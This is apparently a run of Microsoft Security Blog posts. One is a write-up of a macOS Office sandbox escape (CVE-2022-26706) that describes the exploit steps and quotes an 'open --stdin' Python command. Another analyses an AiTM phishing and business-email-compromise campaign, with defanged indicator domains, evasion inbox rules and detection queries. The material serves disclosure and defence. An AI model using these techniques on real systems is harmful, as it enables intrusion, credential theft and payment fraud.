Despite the security restrictions imposed by the App Sandbox’s rules on applications, it’s possible for attackers to bypass the said rules and let malicious codes “escape” the sandbox and execute arbitrary commands on an affected device. These codes could be hidden in a specially crafted Word macro, which, as mentioned earlier, is one of the attackers’ preferred entry points.

Previously reported Office-specific sandbox escape vulnerability

For example, in 2018, MDSec reported a vulnerability in Microsoft Office on macOS that could allow an attacker to bypass the App Sandbox. As explained in their blog post, MDSec’s proof-of-concept (POC) exploit took advantage of the fact that Word could drop files with arbitrary contents to arbitrary directories (even after passing traditional permission checks), as long as these files’ filenames began with a “~$” prefix. This bypass was relatively straightforward: have a specially crafted macro drop a .plist file in the user’s LaunchAgents directory.

The LaunchAgents directory is a well-known persistence mechanism in macOS. PLIST files that adhere to a specific structure describe (that is, contain the metadata of) macOS launch agents initiated by the launchd process when a user signs in. Since these launch agents will be the children of launchd, they won’t inherit the sandbox rules enforced onto Word, and therefore will be out of the Office sandbox.

Shortly after the above vulnerability was reported, Microsoft deployed a fix that denied file writes to the LaunchAgents directory and other folders with similar implications. The said disclosure also prompted us to look into different possible sandbox escapes in Microsoft Word and other applications.

Exploring Launch Services as means of escaping the sandbox

In 2020, several blog posts described a generic sandbox escape vulnerability in macOS’s /usr/bin/open utility, a command commonly used to launch files, folders, and applications just as if a user double-clicked them. While open is a handy command, it doesn’t create child processes on its own. Instead, it performs an inter-process communication (IPC) with the macOS Launch Services, whose logic is implemented in the context of the launchd process. Launch Services then performs the heavy lifting by resolving the handler and launching the right app. Since launchd creates the process, it’s not restricted by the caller’s sandbox, similar to how MDSec’s POC exploit worked in 2018.

However, using open for sandbox escape purposes isn’t trivial because the destination app must be registered within Launch Services. This means that, for example, one couldn’t run files like osascript outside the sandbox using open. Our internal offensive security team therefore decided to reassess the open utility for sandbox escape purposes and use it in a larger end-to-end attack simulation.

Our obvious first attempt in creating a POC exploit was to create a macro that launches a shell script with the Terminal app. Surprisingly, the POC didn’t work because files dropped from within the sandboxed Word app were automatically given the extended attribute (the same one used by Safari to keep track of internet-downloaded files, as well as by Gatekeeper to block malicious files from executing), and Terminal simply refused to run files with that attribute. We also tried using Python scripts, but the Python app had similar issues running files having the said attribute.

Our second attempt was to use application extensibility features. For example, Terminal would run the default macOS shell (zsh), which would then run arbitrary commands from files like ~/.zshenv before running its own command line. This meant that dropping a .zshenv file in the user’s home directory and launching the Terminal app would cause the sandbox escape. However, due to Word’s sandbox rules, dropping a .zshenv file wasn’t straightforward, as the rules only allowed an application to write to files that begin with the “~$” prefix.

However, there is an interesting way of writing such a file indirectly. macOS was shipped with an application called Archive Utility responsible of extracting archive files (such as ZIP files). Such archives were extracted without any user interaction, and the files inside an archive were extracted in the same directory as the archive itself. Therefore, our second POC worked as follows:

  1. Prepare the payload by creating a .zshenv file with arbitrary commands and placing it in a ZIPfile. Encode the ZIPfile contents in a Word macro and drop those contents into a file “~$” in the user’s home directory.
  2. Launch Archive Utility with the open command on the “~$” file. Archive Utility ran outside the sandbox (since it’s the child process of /usr/bin/open) and was therefore permitted to create files with arbitrary names. By default, Archive Utility extracted the files next to the archive itself—in our case, the user’s home directory. Therefore, this step successfully created a .zshenv file with arbitrary contents in the user’s home directory.
  3. Launch the Terminal app with the open command. Since Terminal hosted zsh and zsh ran commands from the .zshenv file, the said file could escape the Word sandbox successfully.
Screenshot of a command line interface showing proof-of-concept exploit code.
Figure 4. Preparing a Word macro with our sandbox escape for an internal Red Team operation

Perception Point’s CVE-2021-30864

In October 2021, Perception Point published a blog post that discussed a similar finding (and more elegant, in our opinion). In the said post, Perception Point released details about their sandbox escape (now identified as CVE-2021-30864), which used the following facts:

  1. Every sandboxed process had its own container directory that’s used as a “scratch space.” The sandboxed process could write arbitrary files, including arbitrary filenames, to that directory unrestricted.
  2. The open command had an interesting –env option that could set or override arbitrary environment variables for the launched app.

Therefore, Perception Point’s POC exploit was cleverly simple:

  1. Drop a .zshenv file in the container directory. This was allowed because sandbox rules weren’t enforced on that directory.
  2. Launch Terminal with the open command but use the –env option to override the HOME environment variable to point to the container directory. This made zsh consider the user’s home directory to be the container directory, and run commands from the planted .zshenv file.

Apple has since patched the vulnerability Perception Point reported in the latest version of macOS, Monterey. While we could still create the “~$” file in the user’s home directory, using open to launch the Archive Utility on the ZIP file now resulted in it being extracted to the Downloads folder. While this is an interesting behavior, we could no longer use it for sandbox escape purposes.

Final exploit attempt: Revisiting the ‘open’ command

After discovering that Apple has fixed both variants that abuse .zshenv, , we decided to examine all the command line options of the open command. Soon after, we came across the following:

Screenshot of a command line interface with the following text:

--stdin PATH
       Launches the application with stdin connected to PATH.
Figure 5. The –stdin option in the open utility as presented by its manual entry

As mentioned earlier, we couldn’t run Python with a dropped .py file since Python refuses to run files with the “” extended attribute. We also considered abusing the PYTHONSTARTUP environment variable, but Apple’s fix to CVE-2021-30864 apparently prevented that option, too. However, –stdin bypassed the “” extended attribute restriction, as there was no way for Python to know that the contents from its standard input originated from a quarantined file.

Our POC exploit thus became simply as follows:

  1. Drop a “~$” file with arbitrary Python commands.
  2. Run open –stdin=’~$’ -a Python, which runs the Python app with our dropped file serving as its standard input. Python happily runs our code, and since it’s a child process of launchd, it isn’t bound to Word’s sandbox rules.
Screenshot of a proof-of-concept exploit code.
Figure 6. Sample minimal POC exploit code

We also came up with a version that’s short enough to be a Twitter post:

Screenshot of a proof-of-concept exploit code.
Figure 7. “Tweetable” POC exploit

Detecting App Sandbox escapes with Microsoft Defender for Endpoint

Since our initial discovery of leveraging Launch Services in macOS for generic sandbox escapes, we have been using our POC exploits in Red Team operations to emulate end-to-end attacks against Microsoft Defender for Endpoint, improve its capabilities, and challenge our detections. Shortly after our Red Team used our first POC exploit, our Blue Team members used it to train artificial intelligence (AI) models to detect our exploit not only in Microsoft Office but also on any app used for a similar Launch Services-based sandbox escape.

After we learned of Perception Point’s technique and created our own new exploit technique (the Python POC), our Red Team saw another opportunity to fully test our own detection durability. Indeed, the same set of detection rules that handled our first sandbox escape vulnerability still turned out to be durable—even before the vulnerability related to our second POC exploit was patched.

Partial screenshot of Microsoft Defender for Endpoint detecting an Office sandbox escape vulnerability. 

The left panel shows the Alert Story with timestamps. The right panel shows the Alert details, including category, MITRE ATT&CK techniques, detection source, service source, detection status, and other information.
Figure 8. Microsoft Defender for Endpoint detecting Office sandbox escape

For Defender for Endpoint customers, such detection durability feeds into the product’s threat and vulnerability management capabilities, which allows them to quickly discover, prioritize, and remediate misconfigurations and vulnerabilities—including those affecting non-Windows devices—through a unified security console.

Learn how Microsoft Defender for Endpoint delivers a complete endpoint security solution across all platforms.

Jonathan Bar Or
Microsoft 365 Defender Research Team

The post Uncovering a macOS App Sandbox escape vulnerability: A deep dive into CVE-2022-26706 appeared first on Microsoft Security Blog.

All Hands-on Deck: A Whole-of-Society Approach for Cybersecurity

The morning of June 9th, I was driving over the Golden Gate Bridge into San Francisco with my family. While crossing the bridge my children shared some facts about this modern engineering marvel. Each day, approx. 100,000 vehicles travel over the bridge deck, which weighs a staggering 150,000 tons, and is suspended by 250 pairs …

All Hands-on Deck: A Whole-of-Society Approach for Cybersecurity Read More »

Categories: Uncategorized Tags:

Microsoft Mitigates Azure Site Recovery Vulnerabilities

July 12th, 2022 No comments

Summary: Microsoft recently mitigated a set of vulnerabilities in Azure Site Recovery (ASR) and released fixes today, July 12, as part of our regular Update Tuesday cycle. These vulnerabilities affect all ASR on-premises customers using a VMware/Physical to Azure scenario and are fixed in the latest ASR 9.49 release. We recommend customers update to the …

Microsoft Mitigates Azure Site Recovery Vulnerabilities Read More »

Categories: Uncategorized Tags:

From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud

July 12th, 2022 No comments

A large-scale phishing campaign that used adversary-in-the-middle (AiTM) phishing sites stole passwords, hijacked a user’s sign-in session, and skipped the authentication process even if the user had enabled multifactor authentication (MFA). The attackers then used the stolen credentials and session cookies to access affected users’ mailboxes and perform follow-on business email compromise (BEC) campaigns against other targets. Based on our threat data, the AiTM phishing campaign attempted to target more than 10,000 organizations since September 2021.

Diagram containing icons and arrows illustrating the sequence of steps in an AiTM phishing campaign.
Figure 1. Overview of AiTM phishing campaign and follow-on BEC

Phishing remains to be one of the most common techniques attackers use in their attempts to gain initial access to organizations. According to the 2021 Microsoft Digital Defense Report, reports of phishing attacks doubled in 2020, and phishing is the most common type of malicious email observed in our threat signals. MFA provides an added security layer against credential theft, and it is expected that more organizations will adopt it, especially in countries and regions where even governments are mandating it. Unfortunately, attackers are also finding new ways to circumvent this security measure. 

In AiTM phishing, attackers deploy a proxy server between a target user and the website the user wishes to visit (that is, the site the attacker wishes to impersonate). Such a setup allows the attacker to steal and intercept the target’s password and the session cookie that proves their ongoing and authenticated session with the website. Note that this is not a vulnerability in MFA; since AiTM phishing steals the session cookie, the attacker gets authenticated to a session on the user’s behalf, regardless of the sign-in method the latter uses.

Microsoft 365 Defender detects suspicious activities related to AiTM phishing attacks and their follow-on activities, such as session cookie theft and attempts to use the stolen cookie to sign into Exchange Online. However, to further protect themselves from similar attacks, organizations should also consider complementing MFA with conditional access policies, where sign-in requests are evaluated using additional identity-driven signals like user or group membership, IP location information, and device status, among others. 

While AiTM phishing isn’t new, our investigation allowed us to observe and analyze the follow-on activities stemming from the campaign—including cloud-based attack attempts—through cross-domain threat data from Microsoft 365 Defender. These observations also let us improve and enrich our solutions’ protection capabilities. This campaign thus also highlights the importance of building a comprehensive defense strategy. As the threat landscape evolves, organizations need to assume breach and understand their network and threat data to gain complete visibility and insight into complex end-to-end attack chains.

In this blog, we’ll share our technical analysis of this phishing campaign and the succeeding payment fraud attempted by the attackers. We’ll also provide guidance for defenders on protecting organizations from this threat and how Microsoft security technologies detect it.

How AiTM phishing works

Every modern web service implements a session with a user after successful authentication so that the user doesn’t have to be authenticated at every new page they visit. This session functionality is implemented through a session cookie provided by an authentication service after initial authentication. The session cookie is proof for the web server that the user has been authenticated and has an ongoing session on the website. In AiTM phishing, an attacker attempts to obtain a target user’s session cookie so they can skip the whole authentication process and act on the latter’s behalf.  

To do this, the attacker deploys a webserver that proxies HTTP packets from the user that visits the phishing site to the target server the attacker wishes to impersonate and the other way around. This way, the phishing site is visually identical to the original website (as every HTTP is proxied to and from the original website). The attacker also doesn’t need to craft their own phishing site like how it’s done in conventional phishing campaigns. The URL is the only visible difference between the phishing site and the actual one. 

Figure 2 below illustrates the AiTM phishing process:

Diagram with icons illustrates a phishing site, which is connected to a malicious proxy server, in between a user and the target website the user is trying to access. Texts and arrows describe the process of how the AiTM phishing website intercepts the authentication process.
Figure 2. AiTM phishing website intercepting the authentication process

The phishing page has two different Transport Layer Security (TLS) sessions—one with the target and another with the actual website the target wants to access. These sessions mean that the phishing page practically functions as an AiTM agent, intercepting the whole authentication process and extracting valuable data from the HTTP requests such as passwords and, more importantly, session cookies. Once the attacker obtains the session cookie, they can inject it into their browser to skip the authentication process, even if the target’s MFA is enabled. 

The AiTM phishing process can currently be automated using open-source phishing toolkits and other online resources. Among the widely-used kits include Evilginx2Modlishka, and Muraena.  

Tracking an AiTM phishing campaign

Using Microsoft 365 Defender threat data, we detected multiple iterations of an AiTM phishing campaign that attempted to target more than 10,000 organizations since September 2021. These runs appear to be linked together and target Office 365 users by spoofing the Office online authentication page.

Based on our analysis, these campaign iterations use the Evilginx2 phishing kit as their AiTM infrastructure. We also uncovered similarities in their post-breach activities, including sensitive data enumeration in the target’s mailbox and payment frauds.

Initial access

In one of the runs we’ve observed, the attacker sent emails with an HTML file attachment to multiple recipients in different organizations. The email message informed the target recipients that they had a voice message.

Screenshot of a phishing email message with an HTML file attachment.
Figure 3. Sample phishing email with HTML file attachment

When a recipient opened the attached HTML file, it was loaded in the user’s browser and displayed a page informing the user that the voice message was being downloaded. Note, however, that the download progress bar was hardcoded in the HTML file, so no MP3 file was being fetched.

Partial screenshot of an HTML page with the text "Please Wait while we fetch your voice message." Below the text is a progress bar indicator with the label "Downloading progress:".
Figure 4. HTML file attachment loaded in the target’s browser
Screenshot of an HTML source code with redacted email address.
Figure 5. Source code of the HTML attachment

Instead, the page redirected the user to a redirector site:

Partial screenshot of a web page that has the Microsoft logo and the following message:
"You will be redirected back to your mail box with audio sent in 1 hour...

to continue".
Figure 6. Screenshot of the redirector site

This redirector acted as a gatekeeper to ensure the target user was coming from the original HTML attachment. To do this, it first validated if the expected fragment value in the URL—in this case, the user’s email address encoded in Base64—exists. If the said value existed, this page concatenated the value on the phishing site’s landing page, which was also encoded in Base64 and saved in the “link” variable (see Figure 7 below).

Screenshot of an HTML source code containing redirection logic.
Figure 7. A redirection logic included in the <script> tag of the redirector site

By combining the two values, the succeeding phishing landing page automatically filled out the sign-in page with the user’s email address, thus enhancing its social engineering lure. This technique was also the campaign’s attempt to prevent conventional anti-phishing solutions from directly accessing phishing URLs.

Note that on other instances, we observed that the redirector page used the following URL format:

hxxp://[username].[wildcard domain].[tld]/#[user email encoded in Base64]

In this format, the target’s username was used as part of an infinite subdomains technique, which we have previously discussed in other phishing campaigns.

Partial screenshot of a web page that has the Microsoft logo and a "please wait..." message.
Figure 8. Evasive redirector site loaded on the target’s browser

After the redirection, the user finally landed on an Evilginx2 phishing site with their username as a fragment value. For example:

Screenshot of a spoofed sign-in page with Microsoft logo.
Figure 9. Sample phishing landing page

The phishing site proxied the organization’s Azure Active Directory (Azure AD) sign-in page, which is typically If the organization had configured their Azure AD to include their branding, the phishing site’s landing page also contained the same branding elements.

Partial screenshot of a mockup sign-in page with Contoso logo.
Figure 10. A mockup of a phishing landing page that retrieves the Azure AD branding of an organization

Once the target entered their credentials and got authenticated, they were redirected to the legitimate page. However, in the background, the attacker intercepted the said credentials and got authenticated on the user’s behalf. This allowed the attacker to perform follow-on activities—in this case, payment fraud—from within the organization.

Post-breach BEC

Payment fraud is a scheme wherein an attacker tricks a fraud target into transferring payments to attacker-owned accounts. It can be achieved by hijacking and replying to ongoing finance-related email threads in the compromised account’s mailbox and luring the fraud target to send money through fake invoices, among others.

Based on our analysis of Microsoft 365 Defender threat data and our investigation of related threat alerts from our customers, we discovered that it took as little time as five minutes after credential and session theft for an attacker to launch their follow-on payment fraud. From our observation, after a compromised account signed into the phishing site for the first time, the attacker used the stolen session cookie to authenticate to Outlook online ( In multiple cases, the cookies had an MFA claim, which means that even if the organization had an MFA policy, the attacker used the session cookie to gain access on behalf of the compromised account.

Finding a target

The following days after the cookie theft, the attacker accessed finance-related emails and file attachments files every few hours. They also searched for ongoing email threads where payment fraud would be feasible. In addition, the attacker deleted from the compromised account’s Inbox folder the original phishing email they sent to hide traces of their initial access.

These activities suggest the attacker attempted to commit payment fraud manually. They also did this in the cloud—they used Outlook Web Access (OWA) on a Chrome browser and performed the abovementioned activities while using the compromised account’s stolen session cookie.

Once the attacker found a relevant email thread, they proceeded with their evasion techniques. Because they didn’t want the compromised account’s user to notice any suspicious mailbox activities, the attacker created an Inbox rule with the following logic to hide any future replies from the fraud target:

“For every incoming email where sender address contains [domain name of the fraud target], move the mail to “Archive” folder and mark it as read.”

Conducting payment fraud

Right after the rule was set, the attacker proceeded to reply to ongoing email threads related to payments and invoices between the target and employees from other organizations, as indicated in the created Inbox rule. The attacker then deleted their replies from the compromised account’s Sent Items and Deleted Items folders.

Several hours after the initial fraud attempt was performed, the attacker signed in once every few hours to check if the fraud target replied to their email. In multiple instances, the attacker communicated with the target through emails for a few days. After sending back responses, they deleted the target’s replies from the Archive folder. They also deleted their emails from the Sent Items folder.

On one occasion, the attacker conducted multiple fraud attempts simultaneously from the same compromised mailbox. Every time the attacker found a new fraud target, they updated the Inbox rule they created to include these new targets’ organization domains.

Below is a summary of the campaign’s end-to-end attack chain based on threat data from Microsoft 365 Defender:

Timeline with bulleted text lists summarizing the phishing campaign's post-breach BEC activities. The lists contain additional technical details, application client IDs, properties, and events.
Figure 11. AiTM phishing campaign and follow-on BEC in the context of Microsoft 365 Defender threat data

Defending against AiTM phishing and BEC

This AiTM phishing campaign is another example of how threats continue to evolve in response to the security measures and policies organizations put in place to defend themselves against potential attacks. And since credential phishing was leveraged in many of the most damaging attacks last year, we expect similar attempts to grow in scale and sophistication.

While AiTM phishing attempts to circumvent MFA, it’s important to underscore that MFA implementation remains an essential pillar in identity security. MFA is still very effective at stopping a wide variety of threats; its effectiveness is why AiTM phishing emerged in the first place. Organizations can thus make their MFA implementation “phish-resistant” by using solutions that support Fast ID Online (FIDO) v2.0 and certificate-based authentication.

Defenders can also complement MFA with the following solutions and best practices to further protect their organizations from such types of attacks:

  • Enable conditional access policies. Conditional access policies are evaluated and enforced every time an attacker attempts to use a stolen session cookie. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as compliant devices or trusted IP address requirements.
  • Invest in advanced anti-phishing solutions thatmonitor and scan incoming emails and visited websites. For example, organizations can leverage web browsers that can automatically identify and block malicious websites, including those used in this phishing campaign.
  • Continuously monitor for suspicious or anomalous activities:
    • Hunt for sign-in attempts with suspicious characteristics (for example, location, ISP, user agent, use of anonymizer services).
    • Hunt for unusual mailbox activities such as the creation of Inbox rules with suspicious purposes or unusual amounts of mail item access events by untrusted IP addresses or devices.

Coordinated threat defense with Microsoft 365 Defender

Microsoft 365 Defender provides comprehensive protection against this AiTM phishing campaign by correlating threat data from various domains. It also coordinates threat defense against the end-to-end attack chain using multiple solutions and has advanced hunting capabilities that allow analysts to inspect their environments further and surface this threat.

Leveraging its cross-signal capabilities, Microsoft 365 Defender alerts customers using Microsoft Edge when a session cookie gets stolen through AiTM phishing and when an attacker attempts to replay the stolen session cookie to access Exchange Online:

Partial screenshot of Microsoft 365 Defender displaying the alert "Stolen session cookie was used".
Figure 12. Microsoft 365 Defender detecting an attempt to use a stolen session cookie to sign into Exchange Online

Microsoft 365 Defender’s unique incident correlation technology also lets defenders see all the relevant alerts related to an AiTM phishing attack pieced together into a single comprehensive view, thus allowing them to respond to such incidents more efficiently:

Graphical user interface of Microsoft 365 Defender portal. The left panel displays a bar graph of active alerts. The right panel provides details of the alerts' scope and supporting evidence.
Figure 13. Microsoft 365 Defender incident page correlating all relevant alerts related to an AiTM phishing attempt

Microsoft 365 Defender is backed by threat experts who continuously monitor the computing landscape for new attacker tools and techniques. Their expert monitoring not only helps alert customers of a possible incident (such as a potential cookie theft during an authentication session), their research on the constantly evolving phishing techniques also enriches the threat intelligence that feeds into the abovementioned protection technologies.

Microsoft Defender for Office 365 detects threat activity associated with this phishing campaign through the following email security alerts. Note, however, that these alerts may also be triggered by unrelated threat activity. We’re listing them here because we recommend that these alerts be investigated and remediated immediately.

  • Email messages containing malicious file removed after delivery​. This alert is generated when any messages containing a malicious file are delivered to mailboxes in an organization. Microsoft removes the infected messages from Exchange Online mailboxes using zero-hour auto purge (ZAP) if this event occurs.
  • Email messages from a campaign removed after delivery​. This alert is generated when any messages associated with a campaign are delivered to mailboxes in an organization. Microsoft removes the infected messages from Exchange Online mailboxes using ZAP if this event occurs.

Microsoft Defender for Cloud Apps detects this AiTM phishing and BEC campaigns through the following alerts:

  • Suspicious inbox manipulation rule. The attackers set an Inbox rule to hide their malicious activities. Defender for Cloud Apps identifies such suspicious rules and alerts users when detected.
  • Impossible travel activity. The attackers used multiple proxies or virtual private networks (VPNs) from various countries or regions. Sometimes, their attack attempts happen at the same time the actual user is signed in, thus raising impossible travel alerts.
  • Activity from infrequent country. Because the attackers used multiple proxies or VPNs, on certain occasions, the egress endpoints of these VPN and proxy servers are uncommon for the user, thus raising this alert.

Azure AD Identity Protection automatically detects and remediates identity-based risks. It detects suspicious sign-in attempts and raises any of the following alerts:

  • Anomalous Token. This alert flags a token’s unusual characteristics, such as its token lifetime or played from an unfamiliar location.
  • Unfamiliar sign-in properties. In this phishing campaign, the attackers used multiple proxies or VPNs originating from various countries or regions unfamiliar to the target user.
  • Unfamiliar sign-in properties for session cookies. This alert flags anomalies in the token claims, token age, and other authentication attributes.
  • Anonymous IP address. This alert flags sign-in attempts from anonymous IP addresses (for example, Tor browser or anonymous VPN).

In addition, Continuous Access evaluation (CAE) revokes access in real time when changes in user conditions trigger risks, such as when a user is terminated or moves to an untrusted location.

Learn how you can stop attacks through automated, cross-domain security with Microsoft 365 Defender.

Microsoft 365 Defender Research Team

Microsoft Threat Intelligence Center (MSTIC)


Indicators of compromise (IOCs)

Redirector domains

  • 32sssaawervvvv[.]biz
  • adminmmi[.]biz
  • auth2022[.]live
  • cleanifl[.]com
  • docpmsi[.]us
  • vrtlsrvmapp[.]biz
  • vrtofcvm[.]live

Phishing site domains  

  • login[.]actionspsort[.]cam
  • login[.]akasmisoft[.]xyz
  • login[.]aueuth11[.]live
  • login[.]auth009[.]xyz
  • login[.]auth2022[.]live
  • login[.]auth83kl[.]live
  • login[.]bittermann-hh[.]co
  • login[.]cbhbanlc[.]com
  • login[.]cleanifl[.]com
  • login[.]clfonl365[.]xyz
  • login[.]gddss36[.]live
  • login[.]grodno-pl[.]com
  • login[.]hfs923[.]shop
  • login[.]karlandpearson[.]com
  • login[.]klm2136[.]click
  • login[.]login-micro[.]mcrsfts-passwdupdate[.]com
  • login[.]mcrosfts-updata[.]live
  • login[.]mcrosfts-update[.]cloud
  • login[.]mcrosfts-update[.]digital
  • login[.]mcrosftts-update[.]cloud
  • login[.]mcrsft-audio[.]xyz
  • login[.]mcrsfts-cloud[.]live
  • login[.]mcrsfts-passwd[.]cloud
  • login[.]mcrsfts-passwd[.]digital
  • login[.]mcrsfts-passwdupdate[.]com
  • login[.]mcrsfts-update[.]cloud
  • login[.]mcrsfts-update[.]digital
  • login[.]mcrsfts-virtualofficevm[.]com
  • login[.]mcrsftsvm-app[.]digital
  • login[.]mcrsftsvm-app[.]live
  • login[.]mcrsfts-voiceapp[.]digital
  • login[.]mcrsftsvoice-mail[.]cloud
  • login[.]microsecurity[.]us
  • login[.]microstoff[.]xyz
  • login[.]mljs365[.]xyz
  • login[.]mwhhncndn[.]xyz
  • login[.]mycrsfts-passwd[.]live
  • login[.]qwwxthn[.]xyz
  • login[.]seafoodsconnection[.]com
  • login[.]sunmarks[.]co[.]uk
  • login[.]tfosorcimonline[.]xyz
  • login[.]whitmanlab[.]uk
  • login[.]yi087011[.]xyz

Advanced hunting queries  

When an attacker uses a stolen session cookie, the “SessionId” attribute in the AADSignInEventBeta table will be identical to the SessionId value used in the authentication process against the phishing site. Use this query to search for cookies that were first seen after OfficeHome application authentication (as seen when the user authenticated to the AiTM phishing site) and then seen being used in other applications in other countries:

let OfficeHomeSessionIds = 
| where Timestamp > ago(1d)
| where ErrorCode == 0
| where ApplicationId == "4765445b-32c6-49b0-83e6-1d93765276ca" //OfficeHome application 
| where ClientAppUsed == "Browser" 
| where LogonType has "interactiveUser" 
| summarize arg_min(Timestamp, Country) by SessionId;
| where Timestamp > ago(1d)
| where ApplicationId != "4765445b-32c6-49b0-83e6-1d93765276ca"
| where ClientAppUsed == "Browser" 
| project OtherTimestamp = Timestamp, Application, ApplicationId, AccountObjectId, AccountDisplayName, OtherCountry = Country, SessionId
| join OfficeHomeSessionIds on SessionId
| where OtherTimestamp > Timestamp and OtherCountry != Country

Use this query to summarize for each user the countries that authenticated to the OfficeHome application and find uncommon or untrusted ones:  

| where Timestamp > ago(7d) 
| where ApplicationId == "4765445b-32c6-49b0-83e6-1d93765276ca" //OfficeHome application 
| where ClientAppUsed == "Browser" 
| where LogonType has "interactiveUser" 
| summarize Countries = make_set(Country) by AccountObjectId, AccountDisplayName 

Use this query to find new email Inbox rules created during a suspicious sign-in session:

//Find suspicious tokens tagged by AAD "Anomalous Token" alert
let suspiciousSessionIds = materialize(
| where Timestamp > ago(7d)
| where Title == "Anomalous Token"
| join (AlertEvidence | where Timestamp > ago(7d) | where EntityType == "CloudLogonSession") on AlertId
| project sessionId = todynamic(AdditionalFields).SessionId);
//Find Inbox rules created during a session that used the anomalous token
let hasSuspiciousSessionIds = isnotempty(toscalar(suspiciousSessionIds));
| where hasSuspiciousSessionIds
| where Timestamp > ago(21d)
| where ActionType == "New-InboxRule"
| where RawEventData.SessionId in (suspiciousSessionIds)

The post From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud appeared first on Microsoft Security Blog.

Introducing security for unmanaged devices in the Enterprise network with Microsoft Defender for IoT

July 11th, 2022 No comments

How many IoT devices are used at your company? If yours is like most organizations, there are probably printers, scanners, and fax machines scattered around the office. Perhaps smart TVs are mounted at reception or in the break room to guide visitors and keep employees up-to-date on company events and news. Or maybe highly connected conference systems bring teams together to collaborate. For some organizations, IoT also includes operational technology (OT) devices used in industrial systems and critical infrastructure. You and your employees probably view these devices as tools to help operate more efficiently. Unfortunately, so do cybercriminals.

While IoT devices can easily outnumber managed endpoints like laptops and mobile phones, they often lack the same safeguards that would ensure their security. To bad actors, these unmanaged devices can be used as a point of entry, for lateral movement, or evasion. The chart below showcases a typical attack lifecycle involving two IoT devices, where one is used as a point of entry, and another one for lateral movement. Too often, the use of such tactics leads to the exfiltration of sensitive information.

Attack lifecycle includes use of IoT devices during intrusion, scanning, exploitation, credential stealing, lateral movement, data theft, and exfiltration stages.

Introducing protection for Enterprise IoT devices in Microsoft Defender for IoT

At the 2021 Microsoft Ignite, we announced the preview of enterprise IoT security capabilities in Microsoft Defender for IoT. With these new capabilities, Defender for IoT adds agentless monitoring to secure enterprise IoT devices connected to IT networks, like Voice over Internet Protocol (VoIP), printers, and smart TVs. A dedicated integration with Microsoft 365 Defender allows Defender for Endpoint customers to extend their extended detection and response (XDR) coverage to include IoT devices. Today, we’re excited to announce the general availability of these capabilities in Defender for IoT.

Defender for IoT covers micro-agents, OT and Enterprise IoT devices with agentless monitoring. for complete protection, Defender for Endpoint covers all managed endpoints.

With this new addition, Defender for IoT now delivers comprehensive security for all endpoint types, applications, identities, and operating systems. The new capabilities allow organizations to get the visibility and insights they need to address complex multi-stage attacks that specifically take advantage of IoT and OT devices to achieve their goals. Customers will now be able to get the same types of vulnerability management, threat detection, response, and other capabilities for enterprise IoT devices that were previously only available for managed endpoints and OT devices.

Further, to make Enterprise IoT security accessible to more customers, we are introducing a dedicated native integration for Microsoft 365 Defender customers. The new integration helps customers to discover and secure IoT devices within Microsoft 365 Defender environments in minutes.

Defender for IoT user interface maps all discovered IoT and OT assets in a single view, allowing to monitor, sort, and uncover connections across devices.

Identifying unmanaged devices

You can’t secure a device if you don’t know it exists. Taking a thorough inventory of all IoT devices can be expensive, challenging, and time-consuming. Employees may connect IoT devices to the network without first notifying IT or operations.

By using the existing Microsoft Defender for Endpoint clients, which are often deployed pervasively across an organization’s infrastructure, we can provide immediate device discovery with no additional deployment or configuration required. For the most complete view of your IoT and OT devices, and specifically for network segments where Defender for Endpoint sensors are not present, Defender for IoT includes a deployable network sensor that can be used to collect all of the network data it needs for discovery, behavioral analytics, and machine learning.

Understanding device vulnerabilities

Knowing all the devices present in your network is a critical step to securing your IoT—but it’s only the first step. To understand the potential risk that those devices pose to your network and organization, you need to be able to stay on top of insecure configurations and vulnerabilities that may be present within your inventory of devices.

These types of devices are often unpatched, misconfigured, and unmonitored, which makes them an immediate target for an attacker. Defender for IoT assesses all your enterprise IoT devices, offering recommendations in the Microsoft 365 console as part of the ongoing investigation flow for network-based alerts. 

New IoT devices are being introduced into an environment all the time. Because of that, the identification and risk assessment processes run continuously within Defender for IoT to ensure maximum visibility and posture at all times.

Securing IoT devices against threats

Threat detection remains one of the most difficult tasks in the IoT domain. Defender for IoT customers benefit from the machine learning and threat intelligence obtained from trillions of signals collected daily across the global Microsoft ecosystem (like email, endpoints, cloud, Microsoft Azure Active Directory, and Microsoft 365), augmented by IoT- and OT-specific intelligence. By applying machine learning and threat intelligence, we help our customers to reduce the alert signal to noise ratio by providing them with prioritized incidents that render end-to-end attacks in complete context rather than giving them an endless list of uncorrelated alerts.

Just recently, this approach enabled Defender for IoT to rank number one in threat visibility coverage in the MITRE ATT&CK for ICS evaluation, successfully detecting malicious activity for 100 percent of major attack steps and 96 percent of all adversary sub-steps, with fewest missed detections of any other vendor.

Defender for IoT: Complete coverage across all IoT/OT

It is certain that the demand for digital transformation and pressure to remain competitive will continue incentivizing organizations to embrace more IoT technologies, whether they are smart TVs in offices or industrial controllers in plants. Chief Information Security Officers will soon be responsible for an attack surface area that is many times larger than their managed device footprint. With the latest release in Defender for IoT, we’re extending coverage to enterprise IoT devices to help customers remain secure across the entire spectrum of their IoT technologies. What’s more, for the first time we’re enabling our Defender for Endpoint customers to gain visibility into their IoT devices within minutes and without buying or deploying any additional technologies or products.

Microsoft Defender for IoT remains a major component of the broader Microsoft SIEM and XDR solutions. Through native integration with Microsoft Defender and Microsoft Sentinel, we can provide customers with the automation and visualization tools they need to address attacks crossing IT and OT network boundaries. These integrations also empower analysts to perform incident response holistically rather than as separate disconnected attacks that require extensive manual investigations to bring together. With these efficiency gains, organizations can stop attacks and bring their environments back to a pre-breach state far more quickly.

We’re excited to reach this major milestone on our journey to securing customers in IoT and OT and invite you to explore how Defender for IoT can help your organization.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Introducing security for unmanaged devices in the Enterprise network with Microsoft Defender for IoT appeared first on Microsoft Security Blog.

KuppingerCole rates Microsoft as outstanding in functionality for secure collaboration

We are excited to share that Microsoft has been rated “Outstanding in Functionality” in the KuppingerCole Market Compass for Secure Collaboration, May 2022. Microsoft was also the only company to be awarded the highest possible score of “Strong Positive” in all five categories: security, deployment, interoperability, usability, and market standing for the Microsoft Purview Information Protection platform.

KuppingerCole graphic awarding rewarding Microsoft with Outstanding Functionality rating.

